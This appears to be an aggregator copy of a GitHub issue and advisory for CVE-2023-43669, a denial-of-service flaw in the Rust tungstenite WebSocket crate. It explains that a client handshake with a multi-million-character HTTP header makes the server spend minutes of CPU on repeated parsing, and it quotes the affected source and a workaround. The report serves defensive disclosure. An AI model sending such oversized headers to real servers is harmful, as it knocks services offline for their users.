Headline
CVE-2023-43669: denial of service with long HTTP request header · Issue #376 · snapview/tungstenite-rs
The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).
I work on an application that depends on tungstenite and is intended to offer server-side ws:// support to untrusted clients over the public Internet. There are hundreds of instances of the server application operated independently by our community members, and it’s not feasible to have other devices (e.g., web application firewalls) protect them. We want to avoid situations where a small number of malicious HTTP requests can devour server CPU resources.
I’m seeing that a single HTTP request (i.e., before the “upgrade: websocket” happens) with any long header can cause request processing to take several minutes or more. For example, testing on a low-cost Ubuntu 23.04 VPS as the server, if the header is 20 million characters, there’s more than 99% CPU consumption for five minutes. Similar results have been seen by multiple persons on various Linux systems with tungstenite 0.20.0. Relative to this tungstenite source code
pub fn single_round<Obj: TryParse>(mut self) -> Result<RoundResult<Obj, Stream>> {
trace!(“Doing handshake round.”);
match self.state {
HandshakeState::Reading(mut buf) => {
let read = buf.read_from(&mut self.stream).no_block()?;
match read {
Some(0) => Err(Error::Protocol(ProtocolError::HandshakeIncomplete)),
Some(_) => Ok(if let Some((size, obj)) = Obj::try_parse(Buf::chunk(&buf))? {
buf.advance(size);
RoundResult::StageFinished(StageResult::DoneReading {
result: obj,
stream: self.stream,
tail: buf.into_vec(),
})
} else {
RoundResult::Incomplete(HandshakeMachine {
I’m seeing more than 4000 calls each to single_round, try_parse, and RoundResult::Incomplete. Looking at buf.len() here
fn try_parse(buf: &[u8]) -> Result<Option<(usize, Self)>> {
let mut hbuffer = [httparse::EMPTY_HEADER; MAX_HEADERS];
I see a value between 100 and 200 on the first call, and the observed value gradually increases until it gets to 20 million after more than 4000 calls, five minutes later. At that point, a client that sent all the required headers gets an “HTTP/1.1 101 Switching Protocols” response with connection, upgrade, and sec-websocket-accept response headers. (If the client didn’t send the required request headers, for example sending only My-Long-Header: followed by 20 million characters, the five minutes of CPU time still happens but of course “Switching Protocols” isn’t allowed by tungstenite.)
We’re able to work around this by checking for a large total header size (and dropping the client’s connection) before any of tungstenite’s code is called. However, maybe many other crates that depend on tungstenite could experience excessive CPU consumption if people can send long HTTP request headers.
The question is: should this issue be resolved within tungstenite, e.g., by rejecting long header lines (maybe in a configurable way) sooner, by avoiding calls to try_parse until a complete header line (ending with \n) is read, or by making some other change?
I don’t think the issue can be attributed to the httparse crate - RFC 7230 3.2.5 allows unlimited header sizes, but tungstenite (in its role as code to implement a server) could choose an upper bound.
Is this a vulnerability in tungstenite, or is tungstenite simply not intended to remain performant when a header has millions of characters?
Related news
The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).